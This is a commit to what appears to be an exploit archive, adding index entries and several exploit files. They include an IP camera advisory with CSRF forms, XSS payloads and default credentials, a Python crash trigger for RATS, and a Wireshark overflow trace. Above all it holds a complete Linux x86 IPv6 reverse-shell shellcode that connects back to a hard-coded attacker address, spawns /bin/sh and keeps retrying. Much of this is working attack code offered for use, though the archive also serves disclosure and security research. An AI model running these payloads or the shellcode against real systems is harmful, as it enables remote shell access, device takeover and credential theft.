DB: 2016-04-30

9 new exploits Linux x86 Reverse TCP Shellcode (ipv6) Observium 0.16.7533 - Cross Site Request Forgery Observium 0.16.7533 - Authenticated Arbitrary Command Execution Merit Lilin IP Cameras - Multiple Vulnerabilities Rough Auditing Tool for Security (RATS) 2.3 - Array Out of Block Crash Wireshark - dissect_2008_16_security_4 Stack-Based Buffer Overflow Wireshark - alloc_address_wmem Assertion Failure Wireshark - ett_zbee_zcl_pwr_prof_enphases Static Out-of-Bounds Read GLPi 0.90.2 - SQL Injection
2016-04-30 05:01:53 +00:00 · 2016-04-30 05:01:53 +00:00 · 7472667089
commit 7472667089
parent 875ff32145
10 changed files with 1238 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -35938,6 +35938,7 @@ id,file,description,date,author,platform,type,port
 39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (Powershell)",2016-04-21,b33f,windows,local,0
 39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x and 5.x - Persistent XSS",2016-04-25,Vulnerability-Lab,jsp,webapps,0
 39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0
 39722,platforms/lin_x86/shellcode/39722.c,"Linux x86 Reverse TCP Shellcode (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
 39725,platforms/hardware/webapps/39725.rb,"Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443
 39726,platforms/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443
 39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Local Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0
@ -35955,3 +35956,11 @@ id,file,description,date,author,platform,type,port
 39741,platforms/osx/local/39741.txt,"Mach Race OS X Local Privilege Escalation Exploit",2016-04-27,fG!,osx,local,0
 39742,platforms/php/remote/39742.txt,"PHP 7.0.5 - ZipArchive::getFrom* Integer Overflow",2016-04-28,"Hans Jerry Illikainen",php,remote,0
 39743,platforms/windows/dos/39743.txt,"Windows Kernel - win32k.sys TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)",2016-04-28,"Google Security Research",windows,dos,0
 39744,platforms/php/webapps/39744.html,"Observium 0.16.7533 - Cross Site Request Forgery",2016-04-29,"Dolev Farhi",php,webapps,80
 39745,platforms/php/webapps/39745.txt,"Observium 0.16.7533 - Authenticated Arbitrary Command Execution",2016-04-29,"Dolev Farhi",php,webapps,80
 39746,platforms/cgi/webapps/39746.txt,"Merit Lilin IP Cameras - Multiple Vulnerabilities",2016-04-29,Orwelllabs,cgi,webapps,80
 39747,platforms/linux/dos/39747.py,"Rough Auditing Tool for Security (RATS) 2.3 - Array Out of Block Crash",2016-04-29,"David Silveiro",linux,dos,0
 39748,platforms/multiple/dos/39748.txt,"Wireshark - dissect_2008_16_security_4 Stack-Based Buffer Overflow",2016-04-29,"Google Security Research",multiple,dos,0
 39749,platforms/multiple/dos/39749.txt,"Wireshark - alloc_address_wmem Assertion Failure",2016-04-29,"Google Security Research",multiple,dos,0
 39750,platforms/multiple/dos/39750.txt,"Wireshark - ett_zbee_zcl_pwr_prof_enphases Static Out-of-Bounds Read",2016-04-29,"Google Security Research",multiple,dos,0
 39751,platforms/php/webapps/39751.txt,"GLPi 0.90.2 - SQL Injection",2016-04-29,"High-Tech Bridge SA",php,webapps,80
--- a/platforms/cgi/webapps/39746.txt
+++ b/platforms/cgi/webapps/39746.txt
@ -0,0 +1,389 @@
  _   _   _   _   _   _   _   _   _   _
 / \ / \ / \ / \ / \ / \ / \ / \ / \ / \
 ( 0 | R | W | 3 | L | L | L | 4 | 8 | 5 )
 \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/
     www.orwelllabs.com
                      securityadivisory
@orwelllabs
   ;)(r
 By sitting in the alcove, and keeping well back,
 Winston was able to remain outside the range of the telescreen...
 * Adivisory Information
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 (+) Title: Merit Lilin IP Cameras Multiple Vulnerabilities
 (+) Vendor: Merit Lilin Enterprise Co., Ltd.
 (+) Research and Advisory: Orwelllabs
 (+) Adivisory URL:
 http://www.orwelllabs.com/2016/04/merit-lilin-ip-cameras-multiple_27.html
 (+) OLSA-ID: OLSA-2016-04-28
 (+) Affected Versions: L series products with firmware 1.4.36/1.2.02, OS
 Version: Linux 2.6.38/Linux 2.6.32
 (+) IoT Attack Surface: Device Administrative
 Interface/Authentication/Authorization
 (+) Owasp IoTTop10: I1, I2
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 * Adivisory Overview
 --+---------------------------------------------+------+--------------------------------------------
 id|         Vulnerability Title               | Rank |      Attack Surface
 --+---------------------------------------------+------+--------------------------------------------
 1 | Multiple Cross-site Request Forgery |  I1  | Insecure Web Interfaces
 2 | Multiple Cross-site Scripting/HTML Injection|  I1  | Insecure Web
 Interfaces
 3 | Hard-coded credentials   |  I1  | Insecure Web Interfaces
 4 | Cleartext sensitive data   |  I1  | Insecure Web Interfaces
 5 | Weak Passwords/Known credentials       |  I1  | Insecure Web Interfaces
 6 | Account lockout   |  I1  | Insecure Web Interfaces
 7 | Poorly Protected Credentials     |  I2  | Insufficient
 Authentication/Authorization
 --+---------------------------------------------+------+--------------------------------------------
 Vendor Background
 =================
 LILIN, is a global IP video manufacturer of IP video cameras, recording
 devices, and software with over 30 years of experience.
 1. Multiple Cross-site Request Forgery
 ======================================
 Merit LILIN IP Cameras are prone to multiple cross-site request forgery
 vulnerabilities.
 (+) Technical Details and PoCs:
 -------------------------------
 # Basic >> System >> User
 > Changing 'admin' password to 'w!nst0nSm!th'
 <html>
  <!-- Orwelllabs - Merit Lilin IP Camera - CSRF PoC -->
  <body>
    <form action="
 http://xxx.xxx.xxx.xxx/apply2.cgi?action=useredit&user_seq=1&user_account=admin&user_password=w!nst0nSm!th&user_priority=254&user_group=0
 ">
      <input type="submit" value="Submit form" />
    </form>
  </body>
 </html>
 # Basic >> Network >> DDNS
 > change DDNS information (user/hostname/password)
 <html>
  <!-- Orwelllabs - Merit Lilin IP Camera - CSRF PoC -->
  <body>
    <form action="
 http://xxx.xxx.xxx.xxx/apply.cgi?action=ddns_apply&next_page=ddns.asp&ddns_type=0&ddns_flag=1&ddns_account=Winston&ddns_pwd=pass&ddns_hostname=smithwmachine&ddns_new_pwd=&ddns_wanip=
 ">
      <input type="submit" value="Submit form" />
    </form>
  </body>
 </html>
 # SNMP
 > change community/user/pass/pripass/v3rouser/etc.
 <html>
  <!-- Orwelllabs - Merit Lilin IP Camera - CSRF PoC -->
  <body>
    <form action="
 http://xxx.xxx.xxx.xxx/snmp?snmpenable=0&v12rwcommunity=public&v12rocommunity=private&v3user=admin&v3authpass=password&v3pripass=w!nst0nSm!th&v3rwuser=public&v3rouser=private
 ">
      <input type="submit" value="Submit form" />
    </form>
  </body>
 </html>
 # Basic >> Network >> SIP
 > change sip_domain_server/sipreg_username/sipreg_password/sip_port=/etc.
 <html>
  <!-- Orwelllabs - Merit Lilin IP Camera - CSRF PoC -->
  <body>
    <form action="
 http://xxx.xxx.xxx.xxx/apply.cgi?action=sip_apply&next_page=sip.asp&voip_flag=1&sip_domain_server=lilintw.ddnsipcam.com&sipreg_username=admin&sipreg_password=pass&sipreg_expires=0&sip_port=5060&audiortp_port=7078&videortp_port=9078
 ">
      <input type="submit" value="Submit form" />
    </form>
  </body>
 </html>
 2. Multiple Cross-site Scripting/HTML Injection
 ====================-==========================
 Merit Lilin IP Cameras are prone to multiple cross-site scripting
 vulnerabilities.
 Technical Details and PoCs:
 ---------------------------
 [SAMBA] Advance >> System >> SAMBA Service
 ------------------------------------------
 %- Script: apply.cgi
 %- affected parameters:
 (+) action
 (+) SambaRecordState
 (+) SAMBA_OSD
 (+) SAMBARecordOption2
 (+) SAMBARecordFormat
 (+) SAMBAPreRecordTime
 (+) SAMBAServer
 (+) SAMBAServerPort
 (+) SAMBAServerAccount
 (+) SAMBAServerPassword
 (+) SAMBAServerDirectory
 %- [ *** XSS *** ] Payload(1) used:
 123%3Cimg%20src=%22x%20%22%20onerror=prompt%28%22Lilin_Password:%22%29%20/%3E
 %- URL: http://xxx.xxx.xxx.xxx/apply.cgi?action=[ *** XSS ***
 ]&SambaRecordState=[ *** XSS *** ]&SAMBA_OSD=[ *** XSS ***
 ]&SAMBARecordOption2=[ *** XSS *** ]&SAMBARecordFormat=[ *** XSS ***
 ]&SAMBAPreRecordTime=[ *** XSS *** ]&SAMBAServer=[ *** XSS ***
 ]&SAMBAServerPort=[ *** XSS *** ]&SAMBAServerAccount=[ *** XSS ***
 ]&SAMBAServerPassword=[ *** XSS *** ]&SAMBAServerDirectory=[ *** XSS *** ]
 [General] -> Basic >> System >> General
 ---------------------------------------
 - Affected script: apply.cgi
 - affected parameters:
 (+) action
 (+) next_page
 (+) SAMBAServerDirectory
 %- [ *** XSS *** ] Payload(2) used:
 %22%3E%3Cscript%3Ealert%281%29%3C/script%3E
 %- URL http://xxx.xxx.xxx.xxx/apply.cgi?action=[ *** XSS *** ]&next_page=[
 *** XSS ***
 ]&CAM_NAME=LR6122&ACTIVEX_OSD_NAME=LR6122&CAM_OSD=0&TIMER_OSD=0&ACTIVEX_OSD_ENABLE=0&ACTIVEX_MODE=0
 [HTTP POST Service] -> Advance >> Event >> HTTP POST Service
 ------------------------------------------------------------
 - Affected script: apply.cgi
 - affected parameters:
 (+) AM_HTTP_JPEG
 (+) next_page*-*
 (+) HTTPPostPort*-*
 %- [ *** XSS *** ] Payload used:
 123%3Cimg%20src=%22x%20%22%20onerror=prompt%28%22Lilin_Password:%22%29%20/%3E
 *-* Payload(2)
 %- URL:
 http://xxx.xxx.xxx.xxx/apply.cgi?action=httppost_apply&next_page=httppost.asp&HTTPServer=192.168.0.2&HTTPPostPort=56082&HTTPAccount=LILIN&HTTPPassword=control4&AM_HTTP_JPEG=[
 *** XSS *** ]
 3. Hard-coded credentials
 =========================
 This application stores hard-coded credentials in html code.
 Technical Details and PoCs:
 ---------------------------
 (+) GET -> http://xxx.xxx.xxx.xxx/new/index.htm
 HTML Source code:
 <script>
 var g_ScreenMode = GetCookie('ScreenMode');
 if(g_ScreenMode==null || g_ScreenMode=='' || g_ScreenMode==' ')
 {
 g_ScreenMode = 1;
 SetCookie('ScreenMode', 1);
 }
 var g_AD_OSD_FLAG = GV('0','0');
 //Profileno,Width,Height,Type,ScreenSwitch,Resolution,Cmd
 var g_CtrlInfo = new Ctrl_ProfileInfo('',0,0,'',g_ScreenMode,'','');
 var g_AD_RATE = Number('0');
 var g_video_port = Number('0');
 var g_spook_port = Number('554');
 var g_httpd_auth_account = 'admin'; <<<<<---- user
 var g_httpd_auth_passwd  = 'pass'; <<<<<---- pass
 var g_encode_mode = Number('0');
 var g_profile00_fps_dwell = 1000/Number('15');
 var g_profile01_fps_dwell = 1000/Number('5');
 var g_profile02_fps_dwell = 1000/Number('25');
 var g_profile03_fps_dwell = 1000/Number('0');
 var g_ACTIVEX_OSD_ENABLE = Number('0');
 var g_title_name = 'LR6122';
 var g_CAM_OSD = Number('0');
 var g_TIMER_OSD = Number('0');
     [... Snip ...]
 (+) GET -> http://xxx.xxx.xxx.xxx/new/no_sd_file.htm
 HTML source code:
 [... Snip ...]
 //http://192.168.3.162/sdlist?dirlist=0
 //http://192.168.3.225/sdlist?filelist=2012081001
 //var g_AllDir =
 "2012080901,2012080902,2012080903,2012080904,2012080905,2012080906:2012081001,2012081002:2012081101,2012081111";
 //var g_AllFiles =
 "20120809010124.avi,20120809010234.avi,20120809010334.avi,20120809010434.avi,20120809010534.avi,20120809010643.avi";
 var g_httpd_auth_account = GV('admin','admin'); <<<<<---- here
 var g_httpd_auth_passwd = GV('pass','pass');     <<<<<---- here
 [... Snip ...]
 4. Cleartext sensitive data
 ===========================
 Everything is trasmite over HTTP, including credentials,
 like this, when an administrador "submmit" the Samba configuration form
 (cleartext everywhere).
 Technical Details and PoCs:
 ---------------------------
 GET
 /apply.cgi?action=sambarec_apply&SambaRecordState=0&SAMBA_OSD=0&SAMBARecordOption2=0&SAMBARecordFormat=0&SAMBAPreRecordTime=5&SAMBAServer=192.168.0.100&SAMBAServerPort=5000&SAMBAServerAccount=admin&SAMBAServerPassword=pass&SAMBAServerDirectory=/Public
 HTTP/1.1
 Host: xxx.xxx.xxx.xxx
 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101
 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Authorization: Basic YWRtaW46cGFzcw==
 Connection: keep-alive
 5. Weak Default Credentials/Known credentials
 =============================================
 The vast maiority of these devices remain with default credential
 admin:pass (cameras)/admin:1111 (NVR) and costumers are not obligated to
 change it during initial setup. The best
 6. Account Lockout
 ==================
 There is no control to prevent brute force attacks and to lockout an
 account after X failed login attempts.
 I1.Impact
 ---------
 Insecure web interfaces can result in data loss or corruption, lack of
 accountability, or denial of access and can lead to complete device
 takeover.
 7. Poorly Protected Credentials
 ===============================
 An attacker in the same network is able to capture and decode the
 credentials as they aren't trasmited over HTTPs and are protected using
 just Base64 encoding.
 Technical Details and PoCs:
 ---------------------------
 > GET Request of) Authentication Process
 GET /new/setup.htm HTTP/1.1
 Host: xxx.xxx.xxx.xxx
 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101
 Firefox/45.0
 Accept: O|orwell/labs,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Referer: http://xxx.xxx.xxx.xxx/new/setup.htm
 Cookie: lang=0; ScreenMode=O-Orw3lll@bs; profileno=0; uimode=1
 Connection: keep-alive
 Authorization: Basic YWRtaW46cGFzcw==
 Affected products
 =================
 L series with firmware 1.4.36/1.2.02, OS Version: Linux 2.6.38/Linux 2.6.32.
 LB1022X
 LR7224X
 LR7228X
 LR7424X
 LR7428X
 LR7722X
 LR7022
 LR7922
 LR6122X
 LR6022X
 LR2322X
 LR2122
 LR312
 LR832
 LR2522
 LD6122X
 LD2322X
 LD2122
 LD2222
 *Once this is related with a old bad design its probably that a large range
 of products are affected by reported issues.
 Timeline
 ++++++++
 2016-03-23: First attemp to contact Vendor
 2016-04-22: Request #13617 "Lilin Products Vulnerabilities" created
 2016-04-23: Attemp to contact vendor
 2016-04-25: Vendor response (ask for details)
 2016-04-27: According to the Vendor these issues are already know and will
 be remediated in the future.
 2016-04-28: Full disclosure
 About Orwelllabs
 ++++++++++++++++
 Orwelllabs is an independent security research lab interested in IoT, what
 means embedded devices and all its components like web applications, network,
 mobile applications and all surface areas prone to attack. Orwelllabs aims
 to study, learn and produce some intelligence around this vast and
 confusing big picture called smart cities. We have special appreciation for
 devices designed to provide security to these highly technological cities,
 also known as Iost (Internet of Things Security).
 -----BEGIN PGP PUBLIC KEY BLOCK-----
 mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt
 xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH
 xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf
 55hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY
 U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I
 SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y
 d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI
 AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA
 Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE
 f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n
 pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW
 LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN
 95rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965
 AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf
 ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U
 gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm
 tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK
 6L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc
 TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb
 DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30
 MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf
 Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q
 FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU
 I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB
 C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37
 =IZYl
 -----END PGP PUBLIC KEY BLOCK-----
--- a/platforms/lin_x86/shellcode/39722.c
+++ b/platforms/lin_x86/shellcode/39722.c
@ -0,0 +1,200 @@
 /*
 # Title: linux x86 reverse tcp (ipv6)
 # Date: 22-04-2016
 # Exploit Author: Roziul Hasan Khan Shifat
 # Tested on: kali 2.0 and Ubuntu 14.04 LTS
 # Contact: shifath12@gmail.com
 */
 /*
 section .text
 	global _start
 _start:
 ;;socket()
 xor ebx,ebx
 mul ebx ;null out eax
 push byte 6
 push byte 0x1
 push byte 10
 mov ecx,esp
 mov al,102 ;socketcall()
 mov bl,1 ;socket()
 int 0x80
 mov esi,eax ;storing socket descriptor (we know return value of any syscall stores in eax)
 xor eax,eax
 mov al,2
 xor ebx,ebx
 int 80h
 cmp eax,ebx
 je connect
 ja exit
 ;------------------
 ;------------------------
 connect:
 xor ecx,ecx
 ;-------------------------------------------------------
 ;struct sockaddr_in6
 xor ebx,ebx
 push dword ebx ;sin6_scope_id 4 byte
 push dword 0x8140a8c0 ; only change it to Your ipv4 address (current ipv4 192.168.64.129)
 push word 0xffff
 push dword ebx
 push dword ebx
 push word bx ;sin6_addr 16 byte (ipv6 address ::ffff:192.168.64.129)
 push dword ebx ;sin6_flowinfo=4 byte
 push word 0xc005 ;sin6_port 2 byte (port 1472)
 push word 10 ;sa_family_t=2 byte 
 ;end of struct sockaddr_in6
 mov ecx,esp
 ;--------------------------------------------
 ;;connect()
 push byte 28 ;sizeof ;struct sockaddr_in6
 push ecx
 push esi
 xor ebx,ebx
 xor eax,eax
 mov al,102
 mov bl,3 ;connect()
 mov ecx,esp
 int 0x80
 xor ebx,ebx
 cmp eax,ebx
 jne retry ;if it fails to connect ,it will  retry to connect to attacker after 10 seconds
 ;dup2(sd,0)
 xor ecx,ecx
 mul ecx
 mov ebx,esi
 mov al,63
 int 80h
 ;dup2(sd,1)
 xor eax,eax
 inc ecx
 mov ebx,esi
 mov al,63
 int 80h
 ;;dup2(sd,2)
 xor eax,eax
 inc ecx
 mov ebx,esi
 mov al,63
 int 80h
 ;;execve(/bin//sh)
 xor edx,edx
 mul edx
 push edx ;null terminated /bin//sh
 push 0x68732f2f
 push 0x6e69622f
 mov ebx,esp
 push edx
 push ebx
 mov ecx,esp
 mov al,11 ;execve()
 int 0x80
 ret
 ;------------------------------------------------------
 retry:
 xor ebx,ebx
 push ebx
 push byte 10
 mul ebx
 mov ebx,esp
 mov al,0xa2 ;nanosleep()
 int 80h
 jmp connect
 ret
 ;----------------------------
 exit:
 xor eax,eax
 mov al,1
 int 80h
 */
 /* 
 to compile:
 $nasm -f elf filename.s
 $ld filename.o
 $./a.out
 to compile shellcode
 $gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
 $./shellcode
 */
 #include<string.h>
 #include<stdio.h>
 char shellcode[]="\x31\xdb\xf7\xe3\x6a\x06\x6a\x01\x6a\x0a\x89\xe1\xb0\x66\xb3\x01\xcd\x80\x89\xc6\x31\xc0\xb0\x02\x31\xdb\xcd\x80\x39\xd8\x74\x02\x77\x77\x31\xc9\x31\xdb\x53\x68\xc0\xa8\x40\x81\x66\x6a\xff\x53\x53\x66\x53\x53\x66\x68\x05\xc0\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x31\xdb\x31\xc0\xb0\x66\xb3\x03\x89\xe1\xcd\x80\x31\xdb\x39\xd8\x75\x36\x31\xc9\xf7\xe1\x89\xf3\xb0\x3f\xcd\x80\x31\xc0\x41\x89\xf3\xb0\x3f\xcd\x80\x31\xc0\x41\x89\xf3\xb0\x3f\xcd\x80\x31\xd2\xf7\xe2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80\xc3\x31\xdb\x53\x6a\x0a\xf7\xe3\x89\xe3\xb0\xa2\xcd\x80\xeb\x8a\xc3\x31\xc0\xb0\x01\xcd\x80";
 int (*exec_shellcode)();
 main()
 {
 printf("Shellcode length: %ld\n",(long)strlen(shellcode));
 exec_shellcode=(int(*)())shellcode;
 (*exec_shellcode)();
 }
--- a/platforms/linux/dos/39747.py
+++ b/platforms/linux/dos/39747.py
@ -0,0 +1,38 @@
 # Exploit Title: RATS 2.3 Array Out of Block Crash
 # Date: 29th April 2016
 # Exploit Author: David Silveiro
 # Author Contact: twitter.com/david_silveiro
 # Website: Xino.co.uk
 # Software Link: https://code.google.com/archive/p/rough-auditing-tool-for-security/downloads
 # Version: RATS 2.3
 # Tested on: Ubuntu 14.04 LTS
 # CVE : 0 day
 from os import system
 def crash():
    with open('crash.c', 'w') as file:
        file.write("char g [MAX_SIZE];") # Out of Block array, causes crash
    try:
        com = ('rats -w3 --xml crash.c')
        return system(com)
    except:
        print("Is RATS installed?")
 def main():
    print("Author:   David Silveiro                      ")
    print("Website:  Xino.co.uk                          ")
    print("Title:    RATS 2.3 Array Out Of Block Crash \n")
    crash()
 if __name__ == "__main__":
    main()
--- a/platforms/multiple/dos/39748.txt
+++ b/platforms/multiple/dos/39748.txt
@ -0,0 +1,115 @@
 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=802
 The following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
 --- cut ---
 ==27389==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff6e9e9a68 at pc 0x7fa9c4c2d7a3 bp 0x7fff6e9e96b0 sp 0x7fff6e9e96a8
 WRITE of size 8 at 0x7fff6e9e9a68 thread T0
    #0 0x7fa9c4c2d7a2 in dissect_2008_16_security_4 wireshark/epan/dissectors/packet-dof.c:2662:32
    #1 0x7fa9c4c2e3f6 in dof_dissect_pdu wireshark/epan/dissectors/packet-dof.c:12619:16
    #2 0x7fa9c4c2ce35 in dof_dissect_pdu_as_field wireshark/epan/dissectors/packet-dof.c:12613:20
    #3 0x7fa9c4c2a7ed in dissect_sgmp wireshark/epan/dissectors/packet-dof.c:8929:26
    #4 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
    #5 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
    #6 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
    #7 0x7fa9c4c68aca in dissect_app_common wireshark/epan/dissectors/packet-dof.c:5405:13
    #8 0x7fa9c4c658b6 in dissect_dpp_2 wireshark/epan/dissectors/packet-dof.c:7370:27
    #9 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
    #10 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
    #11 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
    #12 0x7fa9c4c3a7a2 in dof_dissect_dpp_common wireshark/epan/dissectors/packet-dof.c:5490:13
    #13 0x7fa9c4c5d5c0 in dissect_dnp_1 wireshark/epan/dissectors/packet-dof.c:6676:23
    #14 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
    #15 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
    #16 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
    #17 0x7fa9c4c39598 in dof_dissect_dnp_common wireshark/epan/dissectors/packet-dof.c:5528:9
    #18 0x7fa9c4c390a0 in dissect_dof_common wireshark/epan/dissectors/packet-dof.c:5627:5
    #19 0x7fa9c4c59e5c in dissect_dof_udp wireshark/epan/dissectors/packet-dof.c:5864:12
    #20 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
    #21 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
    #22 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
    #23 0x7fa9c40708f4 in dissector_try_uint wireshark/epan/packet.c:1216:9
    #24 0x7fa9c62dddf0 in decode_udp_ports wireshark/epan/dissectors/packet-udp.c:585:7
    #25 0x7fa9c62ecd90 in dissect wireshark/epan/dissectors/packet-udp.c:1080:5
    #26 0x7fa9c62e0ae0 in dissect_udp wireshark/epan/dissectors/packet-udp.c:1086:3
    #27 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
    #28 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
    #29 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
    #30 0x7fa9c52a333b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:1977:7
    #31 0x7fa9c5312dba in dissect_ipv6 wireshark/epan/dissectors/packet-ipv6.c:2399:14
    #32 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
    #33 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
    #34 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
    #35 0x7fa9c40708f4 in dissector_try_uint wireshark/epan/packet.c:1216:9
    #36 0x7fa9c5938ee2 in dissect_null wireshark/epan/dissectors/packet-null.c:457:12
    #37 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
    #38 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
    #39 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
    #40 0x7fa9c4e81105 in dissect_frame wireshark/epan/dissectors/packet-frame.c:492:11
    #41 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
    #42 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9
    #43 0x7fa9c407aa1e in call_dissector_only wireshark/epan/packet.c:2764:8
    #44 0x7fa9c406b8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
    #45 0x7fa9c406acd4 in dissect_record wireshark/epan/packet.c:539:3
    #46 0x7fa9c401ddb9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
    #47 0x52ef3f in process_packet wireshark/tshark.c:3727:5
    #48 0x52830c in load_cap_file wireshark/tshark.c:3483:11
    #49 0x51e67c in main wireshark/tshark.c:2192:13
 Address 0x7fff6e9e9a68 is located in stack of thread T0 at offset 168 in frame
    #0 0x7fa9c4c2945f in dissect_sgmp wireshark/epan/dissectors/packet-dof.c:8718
  This frame has 8 object(s):
    [32, 34) 'app'
    [48, 52) 'app_len'
    [64, 66) 'version'
    [80, 84) 'length'
    [96, 128) 'key'
    [160, 168) 'response' <== Memory access at offset 168 overflows this variable
    [192, 194) 'version129'
    [208, 212) 'length130'
 HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
 SUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/epan/dissectors/packet-dof.c:2662:32 in dissect_2008_16_security_4
 Shadow bytes around the buggy address:
  0x10006dd352f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10006dd35300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10006dd35310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10006dd35320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10006dd35330: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 02 f2 04 f2
